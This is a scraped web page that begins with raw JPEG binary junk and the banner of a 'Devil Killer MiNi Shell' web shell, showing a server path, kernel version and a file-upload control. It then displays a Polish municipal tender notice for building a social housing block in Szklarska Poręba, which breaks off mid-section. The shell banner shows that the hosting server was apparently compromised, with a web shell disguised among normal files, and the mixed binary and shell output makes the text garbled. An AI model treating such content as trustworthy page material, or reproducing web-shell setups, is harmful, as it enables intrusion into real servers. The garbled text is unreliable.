JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170319/46613-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http:// www.szklarskaporeba.bip.net. pl     zakladka: zamowienia publiczne' target='_blank'>http:// www.szklarskaporeba.bip.net. pl     zakladka: zamowienia publiczne</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46613 - 2017
              z dnia 2017-03-19 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szklarska Poręba: BUDOWA BUDYNKU SOCJALNO-MIESZKALNEGO 
W SZKLARSKIEJ PORĘBIE PRZY UL. WARYŃSKIEGO
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br />    Projekt realizowany jest przy dofinansowaniu z Rządowego Programu Wsparcia         Budownictwa Socjalnego z Funduszu Dopłat tworzenia lokali socjalnych, mieszkań     chronionych, noclegowni i domów dla bezdomnych.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Szklarska Poręba, krajowy numer identyfikacyjny
              23082164100000, ul.
              ul. M. Buczka 
              2,
              58580  
              Szklarska Poręba, woj.
              dolnośląskie, państwo
              Polska, tel.
              757 547 700, e-mail
              sekretariat@szklarskaporeba.pl, faks
              757 547 724.
              <br />
              Adres strony internetowej (URL): www.szklarskaporeba.bip.net.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http:// www.szklarskaporeba.bip.net. pl     zakladka: zamowienia publiczne</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Miasta Szklarska Poręba, ul. M. Buczka 2, 58-580 Szklarska Poręba  lub   bezpośrednio  w  Biurze Obsługi Interesanta  parter (adres  jw.)  </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>BUDOWA BUDYNKU SOCJALNO-MIESZKALNEGO 
W SZKLARSKIEJ PORĘBIE PRZY UL. WARYŃSKIEGO
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest budowa budynku socjalno-mieszkalnego w Szklarskiej Porębie, przy ul. Waryńskiego. 
Zaprojektowany do budowy obiekt położony jest na działce będącej własnością Gminy Szklarska Poręba,oznaczonej  nr ewidencyjnym gruntu  jako 176/2 w  kształcie  wydłużonego prostokąta o powierzchni 3,1490 ha. Granica działki od strony południowej przylega częściowo do działki nr 178 dr i działki nr 177 (ul. Waryń- skiego), zaś od strony północnej do działki nr 175 dr. Teren przedmiotowej działki w większości swojej powierzchni jest płaski, zabudowany istniejącymi trzema budynkami socjalno  mieszkalnymi oraz jednym budynkiem gospodarczym , który przewidziany jest do rozbiórki pod projektowany w nn. opracowaniu obiekt. Duża część powierzchni działki porośnięta jest powierzchnią trawiastą, krzewami i samosiejkami drzew.
Teren działki leży w strefie ochrony krajobrazu kulturowego jako miasto Szklarska Poręba i na jej obszarze nie występują dobra kultury współczesnej. 
Zaprojektowany obiekt w technologii tradycyjnej z materiałów ekologicznych  jest budynkiem socjalno  mieszkalnym, wielorodzinnym -15 mieszkań w układzie segmentowym, o jednej kondygnacji w poziomie przyziemia,  w kształcie wydłużonego prostokąta. Dach dwuspadowy- symetryczny o spadzie 19 (34,5 % )
Wjazd na teren działki  istniejący, usytuowany jest od strony południowo zachodniej z drogi publicznej ul. Waryńskiego na działkę nr 178 dr.
Do zaprojektowanego budynku prowadzi istniejąca droga wewnętrzna o nawierzchni betonowej
pełniąca również funkcję drogi pożarowej. 
Uwaga: dojazd samochodu z betonem jest możliwy tylko do wiaduktu  brak możliwości przejazdu gruszki pod wiaduktem, od wiaduktu do terenu budowy pozostaje jeszcze  około 200mb.
Od strony północnej projektowanego budynku zlokalizowano przy istniejącej drodze betonowej parking dla samochodów osobowych jeden 4  stanowiskowy drugi 11  stanowiskowy. 
 2.Charakterystyczne parametry techniczne:
 
Powierzchnia zabudowy stan surowy (bez ocieplenia)	-	513,99 m
Powierzchnia użytkowa	-	429,57 m2
Kubatura budynku - stan surowy (bez ocieplenia)	-               1 982,72 m
Wysokość zabudowy      -             max  5,00 m   
Wysokość do kalenicy	-    4,81 m. Długość elewacji frontowej                                                                           -  max 60,00 m. Szerokość elewacji szczytowej                                                      -   max   9,60 m.  Liczba kondygnacji  przyziemie	-	  1
Ilość miejsc parkingowych  samochody osobowe    -  15

3.	Opis rozwiązań konstrukcyjnych - skrótowy, dla potrzeb  rozeznania zakresu rzeczowego i rozmiaru  przedsięwzięcia:

a)	Ławy fundamentowe  żelbetowe 
b)	Ściany fundamentowe murowane z bloczków betonowych   M  14  
c)	     Ściany konstrukcyjne zewnętrzne i wewnętrzne - z bloczków z betonu komórkowego gr.24cm
d)	Wieńce ,nadproża drzwiowe i okienne  - wieńce monolit. nadproża-   belki żelbetowe prefabrykowane 
e)     Kominy wentylacyjne  z pustaków wentylacyjnych, 
 f)     Więźba dachowa - drewniana dwuspadowa, konstrukcji krokwiowo jętkowej          
g)     Pokrycie dachu -  blacha trapezowa 
h)     Obróbki blacharskie -  okapy, przy kominach i ogniomurach - blacha stalowa ocynkowana powlekana 
w kolorze zbliżonym do pokrycia dachowego. Rynny  150 mm i rury spustowe  125 w systemie PCV -
odprowadzenie wody opadowej  rurami PCV do studni chłonnej  1140
i)    Stolarka okienna  z profili PCV z zastosowaniem styropianowej kształtki podparapetowej  - tzw. ciepły parapet ,  współczynnik przenikania ciepła dla okien max Uc = 0,80 [W/m2 * K]
         Parapety: wewnętrzne  typowe dostosowane do stolarki okiennej;  zewnętrzne stalowe malowane proszkowo w kolorze zbliżonym do tynku elewacji 
j)      Stolarka drzwiowa - drzwi zewnętrzne antywłamaniowe współczynnik przenikania ciepła max Uc =1,4
         [W/m2*K].  Drzwi wewnętrzne - skrzydła płytowe.
k)	 Ścianki działowe  z płyty kartonowo  gipsowej na ruszcie stalowym, z wypełnieniem między płytami wełną mineralną 
l)	 Posadzki    wykładziny z tworzyw sztucznych , wykonane na podkładzie  na gruncie           
m)	Wykończenie ścian wewnętrznych  ściany murowane z bloczków gazobetonowych  wykończone tynkiem gipsowym. Malowanie ścian wewnętrznych i sufitów - farbami emulsyjnymi    w kolorze białym. W pomieszczeniu łazienki w kabinie natryskowej, nad umywalką, w pomieszczeniu kuchni nad zlewozmywakiem  pas z płytek ceramicznych; malowanie farbami emulsyjnymi  
n)	 Elewacja - wykończenie zewnętrzne budynku. Tynki zewnętrzne  cienkowarstwowe, strukturalne, wykonane metodą lekko-mokra
o)	Wentylacja pomieszczeń  dla pomieszczeń kuchnia, łazienka, pokój wentylacja grawitacyjna poprzez pionowe kanały wentylacyjne wyprowadzone ponad dach budynku. Nawiew poprzez nawiewnik podokienny lub nawietrzaki okienne montowane w ramie okiennej.
p)	 Wyposażenie instalacyjne : 
p1) zaopatrzenie w wodę  zasilanie budynku w wodę z projektowanej sieci wodociągowej
                p2) odprowadzenie ścieków bytowych  do kanalizacji sanitarnej 
                p3) zaopatrzenie w energię elektryczną  zgodnie z  technicznymi warunkami przyłączenia
                p4) zaopatrzenie w ciepło  dla ogrzewania pomieszczeń, wytwarzania ciepłej wody użytkowej
                       - zgodnie z warunkami przyłączenia budynku do sieci poboru gazu ziemnego
                p5) odprowadzenie wód opadowych z połaci dachu  do gruntu poprzez 2 studnie chłonne,
                p6) gospodarka odpadami stałymi  projektowane miejsce na pojemniki zamykane, służące do
                       czasowego gromadzenia odpadów stałych z możliwością segregowania, ogrodzone murem
                p7) miejsca postojowe dla samochodów osobowych utwardzone stanowiska postojowe dla 15 sam. _                   p8) dostęp do drogi publicznej  dojazd i wyjazd na działkę nr 176/2 przez istniejący wjazd
z drogi gminnej nr ew. 178 dr.
Stosownie do treści art. 29 ust.3a upzp, Zamawiający żąda zatrudnienia na podstawie umowy o pracę  przez wykonawcę osób zatrudnionych przy wykonywaniu fundamentów wraz z izolacją, ścian konstrukcyjnych zewnętrznych i wewnętrznych, wieńce i naproża okienne oraz drzwiowe, kominy wentylacyjne, więźbę dachową, których wykonywanie czynności polegać będzie na wykonywaniu pracy w sposób określony w art.22 §1 ustawy z 26.06.1974 r.- Kodeks Pracy Dz.U. z 2014 r. poz.1502, z późn.zm.
4. Zatrudnienie na podstawie umowy o pracę do wyżej wymienionych czynności powinno trwać nieprzerwanie przez cały okres realizacji zamówienia. W przypadku każdorazowej zmiany personalnej osób Wykonawca jest zobowiązany bez wezwania do aktualizacji oświadczenia oraz przedłożenia odpowiedniej umowy/ów, o których mowa w podpunkcie 7.4
4 Wykonawca w dniu podpisania umowy zobowiązany jest przedłożyć Zamawiającemu:
   Wykaz osób, które będą wykonywać czynności w zakresie realizacji zamówienia ze wskazaniem, które   z wymienionych osób zatrudnione są  w oparciu o umowę o pracę.
                     Wykaz zawierać musi informacje jednoznacznie wskazujące osobę pracownika oraz zakres
                     wykonywanych przez niego czynności.
                     Nieprzedłożenie Wykazu w wyżej określonym terminie skutkować będzie uznaniem przez Zamawiającego, iż wykonawca uchyla się od podpisania umowy, a następnie Zamawiający zatrzyma mu wadium na podstawie art.46 ust.5 pkt 1,3   upzp. 
        

         Jeżeli  wykonawca będzie się uchylał  od przedłożenia Wykazu, Zamawiający wybierze ofertę najkorzystniejszą  spośród pozostałych ofert, zgodnie z art. 94 ust 3 upzp.
         W celu sporządzenia Wykazu osób  wykonawca może posłużyć się ponownie wzorem stanowiącym Załącznik nr4
W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudniania  na podstawie umowy o pracę osób, o których mowa w punkcie 7.
         Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogu oraz dokonywa- 
- nia   ich oceny, 
   b)  żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzania spełniania ww. wymogu, 
   c)  zwrócenia się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. 
 W trakcie realizacji zamówienia na każde wezwanie Zamawiającego, w wyznaczonym w tym wezwaniu terminie, Wykonawca jest zobowiązany przedłożyć  Zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności , dla których wskazano sposób zatrudnienia na podstawie umowy o pracę. 
   a) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie Zamawiającego. 
         Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę   i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lub podwykonawcy; 
  b)  poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub podwykonawcę kopię   umowy /umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności związane                                      z termomodernizacją  segmentu/ów budynku głównego szpitala, których dotyczy ww. oświadczenie Wykonawcy lub podwykonawcy. 
         Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj.        w szczególności bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania. 
 Z tytułu niespełnienia, na etapie realizacji przedmiotu Umowy,  przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy  o pracę  osób wykonujących czynności, o których mowa w punkcie 7.  Zamawiający przewiduje sankcje w postaci obowiązku zapłaty przez Wykonawcę kary umownej w wysokości określonej w Części II. Wzór umowy - §12 1.f) 
5. Zamawiający, w oparciu o art. 36a. ust.2 upzp, żąda  osobistego wykonania przez wykonawcę  kluczowej części zamówienia, przez którą należy rozumieć: fundamenty wraz z izolacją, ściany  konstrukcyjne zewnętrzne i wewnętrzne, wieńce i naproża okienne i drzwiowe, kominy wentylacyjne, więźbę dachową.

6. Zamawiający żąda wykonania w 2017 roku co najmniej: 
a)	stanu surowego zamkniętego łącznie ze stolarką,
b)	przyłączy i studzienki chłonnej
7. Wymagany okres gwarancji jakości  i rękojmi za wady  dla całego przedmiotu zamówienia - minimum 60 miesięcy-  licząc  wraz z dniem podpisania protokołu odbioru końcowego przedmiotu zamówienia, w którym nie stwierdza się  występowania wad lub wraz z dniem podpisania protokołu odbioru usunięcia wad i usterek stwierdzonych w protokole odbioru końcowego.       

<br /><br /><b>II.5) Główny kod CPV: </b>45211000-9<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45311100-1,
                45262410-8,
                45400000-1,
                45300000-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/08/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>         Za dochowanie terminu zakończenia całego zakresu rzeczowego zadania  uważa się datę pisemnego zgłoszenia gotowości do rozpoczęcia czynności odbiorowych. Zgłoszenie dokonuje wykonawca, a Inspektor nadzoru inwestorskiego potwierdza prawdziwość zgłoszenia.

Z zastrzeżeniem: żądany zakres robót do wykonania w 2017 r.: co najmniej	stan surowy zamknięty łącznie ze stolarką,
przyłącza i studzienka chłonna.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Działalność zawodowa  prowadzona na potrzeby wykonania przedmiotu zmówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień.
Zamawiający nie stawia warunku.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                         b1)   wymagane jest wykazanie przez wykonawcę posiadanie odpowiedniego ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1 000 000zł 
         Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże ww. ubezpieczenie. 






              b2) wymagane jest dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i  zdolnością kredytową)  - w wysokości co najmniej 300 000zł
                      Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże  dysponowanie ww. środkami finansowymi.

<br />
                Informacje dodatkowe
                Wykonawca może, w celu potwierdzenia spełnienia ww.warunków udziału w postępowaniu,  w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części,  polegać na  sytuacji finansowej lub ekonomicznej Podmiotów udostępniających zasoby, zwanych też  innymi podmiotami  niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
 Stosowna sytuacja, o której mowa    wystąpi wyłącznie w przypadku kiedy:
           a)	wykonawca, który polega na  sytuacji innych podmiotów udowodni  Zamawiającemu, że realizując zamówienie, będzie dysponował  niezbędnymi zasobami tych  podmiotów,  w szczególności przedstawiając zobowiązanie  tych podmiotów  do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
Zobowiązanie musi mieć formę pisemną,  być  dołączone do oferty w oryginale i być podpisane przez Podmiot udostępniający zasoby.
b)	 Zamawiający oceni,czy  sytuacja finansowa lub ekonomiczna Podmiotu udostępniającego , pozwolo na wykazanie przez wykonawcę spełnienia warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,   o których mowa w art.24 ust.1 pkt 13-22, 
 
c)z zobowiązania Podmiotu udostępniającego zasoby lub innych dokumentów potwierdzających udostępnianie zasobów musi bezspornie i jednoznacznie  wynikać w szczególności:

-    zakres dostępnych wykonawcy zasobów innego podmiotu,
- sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
-  zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,

d)	jeżeli  sytuacja finansowa lub ekonomiczna, Podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez wykonawcę warunków udziału                  w postępowaniu lub zachodzą wobec niego podstawy wykluczenia, Zamawiający żądać będzie, aby wykonawca  w określonym terminie zastąpił ten Podmiot innym podmiotem lub zobowiązał się do osobistego wykonania odpowiedniego zakresu zamówienia, jeżeli wykaże sytuację finansową lub ekonomiczną, o których mowa w warunku udziału w postępowaniu.
      e)  wykonawca, który polega na sytuacji finansowej lub ekonomicznej Podmiotu udostępniającego zasoby, odpowiada solidarnie z tym Podmiotem, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnione zasoby nie ponosi winy.
<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                c1)  wymagane jest od wykonawcy dysponowanie 
                       Kierownikiem Budowy,
                    - posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych                          w budownictwie bez ograniczeń, w zakresie kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej zgodne z przepisami ustawy z 07.07.1994 r. Prawo budowlane (t. j. Dz.U. z 2016 r. poz.290) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów  lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r. poz.65), w tym również w zakresie dróg;      

                    -  mającym co najmniej 24miesięczne doświadczenie zawodowe nabyte podczas pełnienia funkcji  kierownika budowy;        
         - który przez co najmniej 18 brał udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucja kultury

